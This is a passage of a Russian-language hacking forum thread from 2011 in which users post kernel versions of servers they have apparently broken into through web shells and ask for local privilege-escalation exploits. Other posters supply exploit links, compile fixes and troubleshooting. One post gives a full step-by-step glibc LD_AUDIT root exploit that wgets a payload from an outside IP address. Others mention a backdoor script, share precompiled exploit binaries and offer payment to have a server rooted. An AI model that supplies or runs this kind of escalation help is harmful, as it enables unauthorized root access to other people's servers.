PDA

Просмотр полной версии : повышение прав [задай вопрос - получи ответ]


Страницы : 1 2 [3]

vasykas
22.08.2011, 17:06
/thread229985.html
http://www.webhostingtalk.com/showthread.php?t=670497
http://www.hackforums.net/showthread.php?tid=658410


эти все пробовал нее

Expl0ited

эти тоже

а этот Ac1db1tch3z vs x86_64 Linux Kernel

вообще скомпилен не правильно под это ядро

надо так

gcc Ac1db1tch3z.c -m32 -o Ac1db1tch3z

Expl0ited
22.08.2011, 19:16
будьте добры, для этого есть что-нибудь?
Linux xxxxx 2.6.18-028stab070.5 #1 SMP Fri Sep 17 15:37:23 MSD 2010 x86_64 x86_64 x86_64 GNU/Linux


попробуй этот пост: #499 (https://antichat.live/showpost.php/p/2801886/postcount/499/)


Expl0ited
эти тоже
а этот Ac1db1tch3z vs x86_64 Linux Kernel
вообще скомпилен не правильно под это ядро
надо так
gcc Ac1db1tch3z.c -m32 -o Ac1db1tch3z


У тебя ноябрь, а роберт ю сак сентябрьский, так что даже и не знаю, что тебе посоветовать.

попугай
22.08.2011, 23:34
есть сервер FreeBSD 7.3, но gcc нет - сплойт не запустить? А если скомпилированный бинарник запустить, то будет работать?

Tigger
23.08.2011, 00:23
есть что нибудь
Linux icpu1521 2.6.28.8-20101130b-iscsi-ntacker-fasync-mremap-amd-sec6-grsec #1 SMP Tue Nov 30 18:27:29 CET 2010 i686 GNU/Linux


Тут же установлен grsec, т.ч. про айсидбитчез и возможно другие сплоеты забудь.

Скинь ls -la /lib/libc*; ls -la /lib/libpc*

Возможно Glibc возьмет (сам не проверял возможность эксплуатации Glibc с установленным grsec, но вроде на эксплуатацию уязвимости с Glibc он повлиять не должен, но повторюсь, я не уверен в этом).


Linux ********** 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux


А вот под это попробуй:

http://www.exploit-db.com/exploits/15704/

http://www.exploit-db.com/exploits/15944/

http://www.exploit-db.com/exploits/15916/

Два последних сплоита я сам не тестил, ну и конечно же проверь можно ли взять Glibc'ом.


есть сервер FreeBSD 7.3, но gcc нет - сплойт не запустить? А если скомпилированный бинарник запустить, то будет работать?


Ты троллишь чтоле? =)

gcc только для компиляции, смело запускай из директории которая не под noexec

Кстати под FreeBSD 7.3 советую вот это:

https://rdot.org/forum/showthread.php?t=601

Проверенный сплоит ) Ну это смотря какого года у тебя сборка...

попугай
23.08.2011, 00:43
Ты троллишь чтоле? =)
gcc только для компиляции, смело запускай из директории которая не под noexec
Кстати под FreeBSD 7.3 советую вот это:
https://rdot.org/forum/showthread.php?t=601
Проверенный сплоит ) Ну это смотря какого года у тебя сборка...



Я имею ввиду, что если gcc нет на сервере, то не скомпилировать сплойт.

За сплойт спасибо. Сборка 2010 года.

У кого-нибудь есть уже скомпилированный бинарник или скомпилируйте, пожалуйста, этот сплойт https://rdot.org/forum/showthread.php?t=601

P.S. Сплойты под фряху на лине можно компилить?

vasykas
23.08.2011, 01:08
Linux icpu1521 2.6.28.8-20101130b

-rwxr-xr-x 1 root root 1147548 Jan 21 2010 /lib/libc-2.3.6.so

lrwxrwxrwx 1 root root 13 Sep 15 2010 /lib/libc.so.6 -> libc-2.3.6.so

lrwxrwxrwx 1 root root 14 Sep 15 2010 /lib/libcap.so.1 -> libcap.so.1.10

-rw-r--r-- 1 root root 11024 Apr 14 2004 /lib/libcap.so.1.10

lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcfont.so.0 -> libcfont.so.0.0.0

-rw-r--r-- 1 root root 10644 Sep 5 2006 /lib/libcfont.so.0.0.0

-rw-r--r-- 1 root root 181684 Jan 21 2010 /lib/libcidn-2.3.6.so

lrwxrwxrwx 1 root root 16 Sep 15 2010 /lib/libcidn.so.1 -> libcidn-2.3.6.so

lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcom_err.so.2 -> libcom_err.so.2.1

-rw-r--r-- 1 root root 5820 Dec 6 2007 /lib/libcom_err.so.2.1

lrwxrwxrwx 1 root root 19 Sep 15 2010 /lib/libconsole.so.0 -> libconsole.so.0.0.0

-rw-r--r-- 1 root root 73540 Sep 5 2006 /lib/libconsole.so.0.0.0

-rw-r--r-- 1 root root 21868 Jan 21 2010 /lib/libcrypt-2.3.6.so

lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcrypt.so.1 -> libcrypt-2.3.6.so

lrwxrwxrwx 1 root root 19 Sep 15 2010 /lib/libctutils.so.0 -> libctutils.so.0.0.0

-rw-r--r-- 1 root root 18380 Sep 5 2006 /lib/libctutils.so.0.0.0

-rw-r--r-- 1 root root 5400 Jan 21 2010 /lib/libpcprofile.so

Expl0ited
23.08.2011, 01:11
Linux icpu1521 2.6.28.8-20101130b
-rwxr-xr-x 1 root root 1147548 Jan 21 2010 /lib/libc-2.3.6.so
lrwxrwxrwx 1 root root 13 Sep 15 2010 /lib/libc.so.6 -> libc-2.3.6.so
lrwxrwxrwx 1 root root 14 Sep 15 2010 /lib/libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 11024 Apr 14 2004 /lib/libcap.so.1.10
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 10644 Sep 5 2006 /lib/libcfont.so.0.0.0
-rw-r--r-- 1 root root 181684 Jan 21 2010 /lib/libcidn-2.3.6.so
lrwxrwxrwx 1 root root 16 Sep 15 2010 /lib/libcidn.so.1 -> libcidn-2.3.6.so
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 5820 Dec 6 2007 /lib/libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 Sep 15 2010 /lib/libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 73540 Sep 5 2006 /lib/libconsole.so.0.0.0
-rw-r--r-- 1 root root 21868 Jan 21 2010 /lib/libcrypt-2.3.6.so
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcrypt.so.1 -> libcrypt-2.3.6.so
lrwxrwxrwx 1 root root 19 Sep 15 2010 /lib/libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 18380 Sep 5 2006 /lib/libctutils.so.0.0.0
-rw-r--r-- 1 root root 5400 Jan 21 2010 /lib/libpcprofile.so


Сделай df -h и если дира /tmp не смонтирована в другом разделе, то всё ок можешь приступать к:


$ mkdir /tmp/exploit
$ ln /bin/ping /tmp/exploit/target
$ exec 3 /tmp/exploit/target*
$ rm -rf /tmp/exploit/
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
$ wget -O /tmp/payload.c http://194.105.208.43/payload.c
$ gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso)

(c) http://www.opennet.ru/opennews/art.shtml?num=28338

Если не выйдет, то что же, заюзай: http://blog.nibbles.fr/2230

vasykas
23.08.2011, 01:25
Сделай df -h и если дира /tmp не смонтирована в другом разделе, то всё ок можешь приступать к:


df -h

Filesystem Size Used Avail Use% Mounted on

/dev/sda7 3.7G 1.5G 2.1G 41% /

/dev/sdb 933G 588G 346G 64% /homepages

что это дает

Expl0ited
23.08.2011, 01:27
df -h
Filesystem Size Used Avail Use% Mounted on

/dev/sda7 3.7G 1.5G 2.1G 41% /

/dev/sdb 933G 588G 346G 64% /homepages
что это дает


Всё нормально, пробуй.

vasykas
23.08.2011, 01:30
Всё нормально, пробуй.


в tmp каталог exploit создался но при вводе

ln /bin/ping /tmp/exploit/target

ln: creating hard link `/tmp/exploit/target' to `/bin/ping': Invalid cross-device link

Expl0ited
23.08.2011, 01:36
в tmp каталог exploit создался но при вводе
ln /bin/ping /tmp/exploit/target
ln: creating hard link `/tmp/exploit/target' to `/bin/ping': Invalid cross-device link


Значит ты находишься тут /dev/sdb, а система /dev/sda7

И соответственно ничего не выйдет.

vasykas
23.08.2011, 02:09
Значит ты находишься тут /dev/sdb, а система /dev/sda7
И соответственно ничего не выйдет.


((

vasykas
24.08.2011, 19:33
Что я делаю не так (Glibs)

ввожу:

LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

дает ошибку

и моя консоль уходит в даун

http://jpg1.ru/w/2011/8/24/e2ae7b1a43279cf377682ec5f53c84598ed950a0352bdf2597 4dc0cd.jpg

GroM88
24.08.2011, 19:34
Linux thrashers 2.6.32.8-grsec-2.1.14-modsign-xeon-64 #2 SMP Sat Mar 13 00:42:43 PST 2010 x86_64

Что под это чудо посоветуете?)

][imer
25.08.2011, 20:30
Linux 2.6.18-238.19.1.el5.028stab092.2 #1 SMP Thu Jul 21 19:23:22 MSD 2011 i686

FreeBSD 7.3-amd64-20100831 amd64 at

Linux 2.6.35.7-grsecnew #1 SMP Mon Dec 13 08:34:39 CST 2010 x86_64

Хотя бы под одну, есть что нибудь?

GroM88
25.08.2011, 20:39
Хотя бы под одну, есть что нибудь?


Под первое и 3-е однозначно ничего нет.

sevenup
25.08.2011, 20:39
][imer said:
Linux 2.6.18-238.19.1.el5.028stab092.2 #1 SMP Thu Jul 21 19:23:22 MSD 2011 i686
FreeBSD 7.3-amd64-20100831 amd64 at
Linux 2.6.35.7-grsecnew #1 SMP Mon Dec 13 08:34:39 CST 2010 x86_64
Хотя бы под одну, есть что нибудь?


нет.

vasykas
25.08.2011, 20:39
][imer said:
Linux 2.6.18-238.19.1.el5.028stab092.2 #1 SMP Thu Jul 21 19:23:22 MSD 2011 i686
FreeBSD 7.3-amd64-20100831 amd64 at
Linux 2.6.35.7-grsecnew #1 SMP Mon Dec 13 08:34:39 CST 2010 x86_64
Хотя бы под одну, есть что нибудь?


FreeBSD 7.3-amd64-20100831 amd64 at

https://rdot.org/forum/showthread.php?t=601

Linux 2.6.35.7-grsecnew #1 SMP Mon Dec 13 08:34:39 CST 2010 x86_64

glibs

Expl0ited
25.08.2011, 21:01
Что я делаю не так (Glibs)
ввожу:
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
дает ошибку
и моя консоль уходит в даун
http://jpg1.ru/w/2011/8/24/e2ae7b1a43279cf377682ec5f53c84598ed950a0352bdf2597 4dc0cd.jpg


Скорее всего пропатчен.

Tigger
26.08.2011, 00:18
Что я делаю не так (Glibs)
ввожу:
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
дает ошибку
и моя консоль уходит в даун


Создай sh-файл, пихни туда "LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3", выполни sh-файл, тогда консолька не вылетит, но скорее всего это патч.


Linux thrashers 2.6.32.8-grsec-2.1.14-modsign-xeon-64 #2 SMP Sat Mar 13 00:42:43 PST 2010 x86_64
Что под это чудо посоветуете?)


Мог подойти Ac1dB1tch3z, но врятли возьмет из-за grsec: http://www.exploit-db.com/exploits/15024/

Ну а так дай вывод: ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h


][imer said:
Linux 2.6.18-238.19.1.el5.028stab092.2 #1 SMP Thu Jul 21 19:23:22 MSD 2011 i686


Может быть библиотеки Glibc бажные, покажи вывод команды: ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h


][imer said:
Linux 2.6.35.7-grsecnew #1 SMP Mon Dec 13 08:34:39 CST 2010 x86_64


Попробуй это: http://www.exploit-db.com/exploits/15944/, но врятли, ну а так тоже есть шанс взять Glibc'ом...

GroM88
26.08.2011, 02:01
Мог подойти Ac1dB1tch3z, но врятли возьмет из-за grsec: http://www.exploit-db.com/exploits/15024/


Ac1dB1tch3z не идет...точнее с компиляцией проблема, а точнее вообщем такие ерроры

Сразу при компиляции сплоита была ошибка :

norm.c:62:2: error: #error r34d th3 c0d3 m0r0n !! # <> #

Удалил из сплоита строчку : #error r34d th3 c0d3 m0r0n !! # <> #

попробовал скомпилить и получил такой erro

http://s008.radikal.ru/i306/1108/2a/2ed4a3413440.png

мб у кого нить есть скомпиленный этот сплойт? "Ac1dB1tch3z"


Ну а так дай вывод: ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h




$ ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h
-rwxr-xr-x 1 root root 1375536 Jan 7 2011 /lib/libc-2.7.so
lrwxrwxrwx 1 root root 11 Jan 12 2011 /lib/libc.so.6 -> libc-2.7.so
lrwxrwxrwx 1 root root 14 May 28 2010 /lib/libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 14880 Mar 16 2006 /lib/libcap.so.1.10
lrwxrwxrwx 1 root root 14 May 28 2010 /lib/libcap.so.2 -> libcap.so.2.11
-rw-r--r-- 1 root root 16976 Jul 26 2008 /lib/libcap.so.2.11
lrwxrwxrwx 1 root root 17 May 28 2010 /lib/libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 12776 Apr 15 2008 /lib/libcfont.so.0.0.0
-rw-r--r-- 1 root root 190760 Jan 7 2011 /lib/libcidn-2.7.so
lrwxrwxrwx 1 root root 14 Jan 12 2011 /lib/libcidn.so.1 -> libcidn-2.7.so
lrwxrwxrwx 1 root root 17 May 28 2010 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 11648 Oct 12 2008 /lib/libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 May 28 2010 /lib/libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 140840 Apr 15 2008 /lib/libconsole.so.0.0.0
-rw-r--r-- 1 root root 39112 Jan 7 2011 /lib/libcrypt-2.7.so
lrwxrwxrwx 1 root root 15 Jan 12 2011 /lib/libcrypt.so.1 -> libcrypt-2.7.so
lrwxrwxrwx 1 root root 19 May 28 2010 /lib/libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 21024 Apr 15 2008 /lib/libctutils.so.0.0.0
-rw-r--r-- 1 root root 6192 Jan 7 2011 /lib/libpcprofile.so
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 60G 49G 8.1G 86% /
tmpfs 7.9G 0 7.9G 0% /lib/init/rw
tmpfs 7.9G 0 7.9G 0% /dev/shm
/dev/sda2 3.8G 180M 3.4G 5% /tmp
/dev/sda6 92M 5.6M 81M 7% /var/spool/cron/crontabs
/dev/sdb1 3.6T 3.0T 601G 84% /home

sevenup
26.08.2011, 03:37
Ac1dB1tch3z не идет...точнее с компиляцией проблема, а точнее вообщем такие ерроры
Сразу при компиляции сплоита была ошибка :
norm.c:62:2: error: #error r34d th3 c0d3 m0r0n !! # <> #
Удалил из сплоита строчку : #error r34d th3 c0d3 m0r0n !! # <> #
попробовал скомпилить и получил такой erro
http://s008.radikal.ru/i306/1108/2a/2ed4a3413440.png
мб у кого нить есть скомпиленный этот сплойт? "
Ac1dB1tch3z
"

$ ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h
-rwxr-xr-x 1 root root 1375536 Jan 7 2011 /lib/libc-2.7.so
lrwxrwxrwx 1 root root 11 Jan 12 2011 /lib/libc.so.6 -> libc-2.7.so
lrwxrwxrwx 1 root root 14 May 28 2010 /lib/libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 14880 Mar 16 2006 /lib/libcap.so.1.10
lrwxrwxrwx 1 root root 14 May 28 2010 /lib/libcap.so.2 -> libcap.so.2.11
-rw-r--r-- 1 root root 16976 Jul 26 2008 /lib/libcap.so.2.11
lrwxrwxrwx 1 root root 17 May 28 2010 /lib/libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 12776 Apr 15 2008 /lib/libcfont.so.0.0.0
-rw-r--r-- 1 root root 190760 Jan 7 2011 /lib/libcidn-2.7.so
lrwxrwxrwx 1 root root 14 Jan 12 2011 /lib/libcidn.so.1 -> libcidn-2.7.so
lrwxrwxrwx 1 root root 17 May 28 2010 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 11648 Oct 12 2008 /lib/libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 May 28 2010 /lib/libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 140840 Apr 15 2008 /lib/libconsole.so.0.0.0
-rw-r--r-- 1 root root 39112 Jan 7 2011 /lib/libcrypt-2.7.so
lrwxrwxrwx 1 root root 15 Jan 12 2011 /lib/libcrypt.so.1 -> libcrypt-2.7.so
lrwxrwxrwx 1 root root 19 May 28 2010 /lib/libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 21024 Apr 15 2008 /lib/libctutils.so.0.0.0
-rw-r--r-- 1 root root 6192 Jan 7 2011 /lib/libpcprofile.so
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 60G 49G 8.1G 86% /
tmpfs 7.9G 0 7.9G 0% /lib/init/rw
tmpfs 7.9G 0 7.9G 0% /dev/shm
/dev/sda2 3.8G 180M 3.4G 5% /tmp
/dev/sda6 92M 5.6M 81M 7% /var/spool/cron/crontabs
/dev/sdb1 3.6T 3.0T 601G 84% /home



В комменте сплойта асидбитчес написано что обход защиты грсек умышленно был удалён!

а по поводу не коммпилится, там код с сплойта удалять не нужно...т.к. у вас не ерор а скорее защита от дурака...

при компиляции сплойта добавьте флаг -m32 и будет вам счастье

MisterGood
26.08.2011, 06:03
Перечитал всю тему, но не нашел. Что есть под это:

Linux 2.6.18-028stab070.7 #1 SMP Fri Oct 1 13:53:00 MSD 2010 i686 i686 i386 GNU/Linux

Много чего из этой темы пробовал ничего не идет. GCC есть

Запросил ls -la /boot

Получил:


total 8
drwxr-xr-x 2 root root 4096 Apr 17 2007 .
drwxr-xr-x 20 root root 4096 Jul 30 02:30 ..

BUGAGAlter
26.08.2011, 06:23
вот:

Linux 2.6.20-1.2948.fc6 #1 SMP Fri Apr 27 19:48:40 EDT 2007 i686

и вот:

FreeBSD 4.11-STABLE FreeBSD 4.11-STABLE #0: Mon Mar i386

Tigger
26.08.2011, 12:32
вот:
Linux 2.6.20-1.2948.fc6 #1 SMP Fri Apr 27 19:48:40 EDT 2007 i686
и вот:
FreeBSD 4.11-STABLE FreeBSD 4.11-STABLE #0: Mon Mar i386


Уж для первого ядра могли бы и сами найти сплоет...

enlightenment (http://www.exploit-db.com/exploits/9627/) вот что тебе нужно.

На счет второго - хз. Зависит от даты сборки. Если до 2006 то можно хэш пасса рута узнать этим (http://www.securitylab.ru/poc/261629.php).

][imer
26.08.2011, 13:27
...покажи вывод команды: ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h




Linux 2.6.18-238.19.1.el5.028stab092.2 #1 SMP Thu Jul 21 19:23:22 MSD 2011 i686

$ ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h
-rwxr-xr-x 1 root root 1686224 Oct 26 2010 /lib/libc-2.5.so
lrwxrwxrwx 1 root root 11 Nov 22 2010 /lib/libc.so.6 -> libc-2.5.so
lrwxrwxrwx 1 root root 14 Nov 22 2010 /lib/libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root 10184 Mar 14 2007 /lib/libcap.so.1.10
-rwxr-xr-x 1 root root 191708 Oct 26 2010 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root 14 Nov 22 2010 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root 17 Nov 22 2010 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 6300 Nov 11 2010 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 43616 Oct 26 2010 /lib/libcrypt-2.5.so
lrwxrwxrwx 1 root root 15 Nov 22 2010 /lib/libcrypt.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1295424 Mar 27 2010 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 19 Nov 22 2010 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 16 Nov 22 2010 /lib/libpcre.so.0 -> libpcre.so.0.0.1
-rwxr-xr-x 1 root root 117448 Nov 30 2007 /lib/libpcre.so.0.0.1
Filesystem Size Used Avail Use% Mounted on
/dev/simfs 30G 9.3G 21G 31% /
none 512M 4.0K 512M 1% /dev



Linux 2.6.35.7-grsecnew #1 SMP Mon Dec 13 08:34:39 CST 2010 x86_64

$ ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h
-rwxr-xr-x 1 root root 1689640 Oct 25 2010 /lib/libc-2.5.so
lrwxrwxrwx 1 root root 11 Nov 2 2010 /lib/libc.so.6 -> libc-2.5.so
lrwxrwxrwx 1 root root 14 Sep 17 2009 /lib/libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root 11560 Mar 14 2007 /lib/libcap.so.1.10
-rwxr-xr-x 1 root root 191708 Oct 25 2010 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root 14 Nov 2 2010 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root 17 Nov 6 2009 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 7748 Sep 3 2009 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 45432 Oct 25 2010 /lib/libcrypt-2.5.so
lrwxrwxrwx 1 root root 15 Nov 2 2010 /lib/libcrypt.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1296964 Dec 15 2010 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 14 Sep 17 2009 /lib/libcrypto.so.4 -> libcrypto.so.6
lrwxrwxrwx 1 root root 19 Dec 16 2010 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 878G 739G 95G 89% /
none 4.0G 4.4M 3.9G 1% /dev/shm
/dev/sda1 130M 56M 74M 43% /boot
/usr/tmpDSK 2.0G 507M 1.4G 28% /tmp
164.154.10.10:/home/cl38
2.7T 2.2T 384G 86% /backup

$n@ke
26.08.2011, 14:22
Jul 21 19:23:22 MSD 2011

ха,смешно!

Linux 2.6.35.7-grsecnew #1 SMP Mon Dec 13 08:34:39 CST 2010 x86_64

грсек?декабрь 10 года.незнам незнам.думаю что больше нет,чем да.

MisterGood
26.08.2011, 18:07
Перечитал всю тему, но не нашел. Что есть под это:
Linux 2.6.18-028stab070.7 #1 SMP Fri Oct 1 13:53:00 MSD 2010 i686 i686 i386 GNU/Linux
Много чего из этой темы пробовал ничего не идет. GCC есть
Запросил ls -la /boot
Получил:

total 8
drwxr-xr-x 2 root root 4096 Apr 17 2007 .
drwxr-xr-x 20 root root 4096 Jul 30 02:30 ..



Если это нужно, то вот еще вывод команды ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h


-rwxr-xr-x 1 root root 1670312 Jul 8 2007 /lib/libc-2.6.so
lrwxrwxrwx 1 root root 11 Mar 19 2008 /lib/libc.so.6 -> libc-2.6.so
lrwxrwxrwx 1 root root 14 Mar 19 2008 /lib/libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root 9952 Feb 24 2007 /lib/libcap.so.1.10
-rwxr-xr-x 1 root root 191700 Jul 8 2007 /lib/libcidn-2.6.so
lrwxrwxrwx 1 root root 14 Mar 19 2008 /lib/libcidn.so.1 -> libcidn-2.6.so
lrwxrwxrwx 1 root root 17 Mar 19 2008 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 7600 Dec 12 2007 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 26056 Jul 8 2007 /lib/libcrypt-2.6.so
lrwxrwxrwx 1 root root 15 Mar 19 2008 /lib/libcrypt.so.1 -> libcrypt-2.6.so
-rwxr-xr-x 1 root root 1241516 Oct 12 2007 /lib/libcrypto.so.0.9.8b
lrwxrwxrwx 1 root root 19 Mar 19 2008 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8b
lrwxrwxrwx 1 root root 16 Mar 19 2008 /lib/libpcre.so.0 -> libpcre.so.0.0.1
-rwxr-xr-x 1 root root 158944 Feb 15 2008 /lib/libpcre.so.0.0.1
Filesystem Size Used Avail Use% Mounted on
/dev/vzfs 10G 7.4G 2.7G 74% /
none 16G 4.0K 16G 1% /dev

попугай
26.08.2011, 20:38
2.6.18-194.3.1.el5PAE #1 SMP Sun May 2 04:42:25 EDT 2010


чем можно порутать? Enlightment не сработал

sevenup
26.08.2011, 20:42
чем порутать?


Если система x64 то:

http://www.multiupload.com/OHQFW20FR8

Если i686 то забей. не пробьёшь.

попугай
26.08.2011, 20:44
Если система x64 то:
http://www.multiupload.com/OHQFW20FR8
Если i686 то забей. не пробьёшь.



А, при копировании uname не довел мышку до конца

i686 к сожалению.

$n@ke
26.08.2011, 20:50
MisterGood, у тебя виртуалка((

попугай,пробуй все,что есть.Начиная с энлайтмента и до глибца.

MisterGood
27.08.2011, 05:07
Помогите на такой найти:

Linux 2.6.18-194.11.1.el5 #1 SMP Tue Aug 10 19:05:06 EDT 2010 x86_64

PS как узнать, сервер виртуальный или нет?

sevenup
27.08.2011, 12:01
Помогите на такой найти:
Linux 2.6.18-194.11.1.el5 #1 SMP Tue Aug 10 19:05:06 EDT 2010 x86_64


/showpost.php?p=2807654&postcount=530

SergioBlog
27.08.2011, 14:40
Linux 2.6.21.7-2.fc8xen #1 SMP Fri Feb 15 12:39:36 EST 2008 i686

Есть что-то по такому ядру?

Strilo4ka
27.08.2011, 14:45
Linux 2.6.21.7-2.fc8xen #1 SMP Fri Feb 15 12:39:36 EST 2008 i686
Есть что-то по такому ядру?


пробуйте Linux vmsplice Local Root Exploit

Falknat
27.08.2011, 16:30
Кто может помочь отрутить сервак за WMZ?

Моя ICQ 13-389-238

FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009

Хочу хорошего помощника

MisterGood
27.08.2011, 17:20
Подскажите, что делаю не так. Есть шелл WSO, я пытаюсь через его консоль запустить файл backdoor.pl (на другом серваке все работало). Но немогу подключится через netcat для windows. Что я не так делаю?


/showpost.php?p=2807654&postcount=530


Я его запускаю, но что-то не получается, вот что выводится:


Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.11.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
!!! y0u fuq1ng f41l. g3t th3 fuq 0ut!

Я с *nix системами мало знаком, что это означает?

HAXTA4OK
28.08.2011, 06:05
Linux 2.6.32.26 #1 SMP Thu Dec 9 15:33:24 UTC 2010 x86_64

MisterGood
28.08.2011, 07:50
Помогите плз, не могу скомпилировать эксплойт под FreeBSD 8.1

линк (http://www.exploit-db.com/search/?action=search&filter_description=FreeBSD+8.1)

Konqi
28.08.2011, 13:48
Linux 2.6.32.26 #1 SMP Thu Dec 9 15:33:24 UTC 2010 x86_64


пробуй этот

http://pastebin.com/9MHneaFf

оно взяло мартовскую сборку, у тебя декабрь, может быть повезет..

plaeer
30.08.2011, 13:26
FreeBSD megashare.by 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386

Пробовал http://securityvulns.ru/files/w00t.sh

Но, увы ./w00t.sh: not found сплоит не рабочий или это я что-то не так делаю?

sevenup
30.08.2011, 15:10
FreeBSD megashare.by 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
Пробовал http://securityvulns.ru/files/w00t.sh
Но, увы ./w00t.sh: not found сплоит не рабочий или это я что-то не так делаю?


Ты не так делаешь...

+ на папке скорей всего ноехес стоит

plaeer
30.08.2011, 15:13
Ты не так делаешь...
+ на папке скорей всего ноехес стоит


Что именно не так я делаю?

Как проверить стоит ли noexec?

Перехожу в папку /tmp ввожу id, получаю uid=80(www) gid=80(www) groups=80(www)

Нету noexec...

sevenup
30.08.2011, 18:57
Что именно не так я делаю?
Как проверить стоит ли noexec?
Перехожу в папку /tmp ввожу id, получаю uid=80(www) gid=80(www) groups=80(www)
Нету noexec...


Какая связь между вводом стандартной команды и выполнением неизвестного системе файла ?

Положи в другую папку файл sh, дай ему права(chmod +x file_name.sh) а потом выполняй...если всё равно не получится, то выполни действия скрипта вручную...

MisterGood
05.09.2011, 16:58
Помогите под этот найти


$ uname -a
Linux 2.6.35 #1 SMP Tue Oct 26 17:00:09 CEST 2010 x86_64 x86_64 x86_64 GNU/Linux


И еще вопрос, почему когда я хочу выполнить некоторые команды в консоли, появляется вот такое сообщение:


Query did not return anything

vasykas
05.09.2011, 21:40
если вы с шелла (бэкк-бинд не )при компиляции сплоита при переходе на другую папку права теряются(если вы про это)

vasykas
05.09.2011, 22:04
попробуй этот шелл

http://files.mail.ru/8ZQK7S

extrimportal
06.09.2011, 11:49
А посоветуйте чё нить пожалуйста под

